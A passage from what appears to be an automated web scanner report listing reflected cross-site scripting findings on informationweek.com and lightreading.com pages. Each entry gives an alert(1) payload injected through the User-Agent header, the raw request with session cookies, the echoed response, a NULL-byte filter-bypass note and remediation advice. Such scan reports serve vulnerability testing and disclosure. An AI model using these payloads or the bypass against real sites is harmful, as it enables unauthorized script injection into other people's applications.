HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:23:26 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:26 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 70414
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%0045705</script><ScRiPt>alert(1)</ScRiPt>d1fd8d17d23"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8975f"-alert(1)-"4f852489aac was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whitepaper/Security HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)8975f"-alert(1)-"4f852489aac Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:23:22 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:23:22 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 94163
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)8975f"-alert(1)-"4f852489aac"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ea2ae"-alert(1)-"3fe6567e43a was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whitepaper/Security/Attacks-Breaches/secure-managed-web-hosting-saves-960-gs-from-mali-wp1289321032460 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: ea2ae"-alert(1)-"3fe6567e43a Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:22:28 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:28 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 62112
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %0045a6d</script><script>alert(1)</script>894561d47b0 was submitted in the User-Agent HTTP header. This input was echoed as 45a6d</script><script>alert(1)</script>894561d47b0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /whitepaper/Security/Attacks-Breaches/the-compliance-trap-compliance-for-compliance-s--wp1289426272525 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: %0045a6d</script><script>alert(1)</script>894561d47b0 Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:22:39 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:39 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 62872
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fd212</script>d0389d5d785 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whitepaper/Security/Attacks-Breaches/what-is-security-as-a-service-and-should-smbs-co-wp1289497389050 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)fd212</script>d0389d5d785 Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:21:55 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:21:55 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 62047
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)fd212</script>d0389d5d785"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 571d2"-alert(1)-"7e249f5337f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /whitepaper/Security/Privacy/access-governance-as-a-business-service-an-integ-wp1288732602140 HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)571d2"-alert(1)-"7e249f5337f Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:22:47 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:47 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 62958
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><m ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)571d2"-alert(1)-"7e249f5337f"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop21="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 76ab0</script><a>01eff4aaf68 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /whitepaper/advancedSearch/resultsCollection.jhtml HTTP/1.1 Host: www.informationweek.com Accept: */* Accept-Language: en User-Agent: 76ab0</script><a>01eff4aaf68 Connection: close Cookie: s_lv=1292111917529; s_cc=true; JSESSIONID=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; ebNewBandWidth_.www.informationweek.com=5312%3A1291242057333; s_lv_s=More%20than%207%20days;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:22:54 GMT Server: Apache Cache-Control: no-cache, max-age=0 Expires: Sun, 12 Dec 2010 00:22:54 GMT Last-Modified: Tue, Jan 27 2099 23:59:59 GMT Pragma: no-cache X-ATG-Version: ATGPlatform/7.2 [ DASLicense/0 DPSLicense/0 ] Connection: close Content-Type: text/html Vary: Accept-Encoding, User-Agent Content-Length: 52004
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82764"-alert(1)-"ffb3d3b0e8f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)82764"-alert(1)-"ffb3d3b0e8f Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:10:39 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 263581 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)82764"-alert(1)-"ffb3d3b0e8f"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload feddd"-alert(1)-"8755c8df80a was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ad_redirect.asp HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)feddd"-alert(1)-"8755c8df80a Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response (redirected)
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:01:47 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 262285 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)feddd"-alert(1)-"8755c8df80a"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8c554"-alert(1)-"19027e0a1c6 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /alcatel-lucent-solution-center.asp HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)8c554"-alert(1)-"19027e0a1c6 Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:19:17 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 158678 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="Alcatel-Lucent, Application Enablement, Eco-sustainability, End to End LTE, Cost Transfor ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)8c554"-alert(1)-"19027e0a1c6"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a4ea1"-alert(1)-"fa4e93f88a0 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /archives.asp HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a4ea1"-alert(1)-"fa4e93f88a0 Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:02:30 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Last-modified: Sat, 11 Dec 2010 23:02:29 GMT Expires: Sun, 10 Apr 2011 19:02:29 GMT Etag: s200805.p200805 Content-Length: 177610 Cache-control: max-age=10368000, public
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a4ea1"-alert(1)-"fa4e93f88a0"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97124"-alert(1)-"b9909a118e9 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /asia/ HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)97124"-alert(1)-"b9909a118e9 Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:18:07 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 240908 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)97124"-alert(1)-"b9909a118e9"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 469dc"-alert(1)-"dfaff2c87c8 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /benchmark-surveys.asp HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)469dc"-alert(1)-"dfaff2c87c8 Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:20:14 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 176121 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="light reading, lightreading, magazine, telecom, telecommunications, Internet, convergence ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)469dc"-alert(1)-"dfaff2c87c8"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77c67"-alert(1)-"54c9b998919 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /blackberry-solution-center.asp HTTP/1.1 Host: www.lightreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)77c67"-alert(1)-"54c9b998919 Connection: close Cookie: lightreading%5Fvisits=2; s_nr=1291273863933; lightreading%5Flastvisit=12%2F11%2F2010+7%3A00%3A05+PM;
Response
HTTP/1.1 200 OK Server: nginx/0.8.50 Date: Sun, 12 Dec 2010 00:20:03 GMT Content-Type: text/html Connection: close Vary: Accept-Encoding X-Powered-By: ASP.NET Content-Length: 163025 Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <META name="keywords" content="Research in Motion, BlackBerry, BlackBerry Platform, CIO's Guide, BlackBerry Business Sol ...[SNIP]... ; s.channel=""; s.pageType=""; s.prop1=""; s.prop2=""; s.prop3=""; s.prop4=""; s.prop5=""; s.prop6=""; s.prop7=""; s.prop8="174.121.222.18 | Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)77c67"-alert(1)-"54c9b998919"; s.prop9=""; s.prop10=""; s.prop11=""; s.prop12=""; s.prop13=""; s.prop14=""; s.prop15=""; s.prop16=""; s.prop19="False"; s.prop20="";
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e989"-alert(1)-"7b3ba870779 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
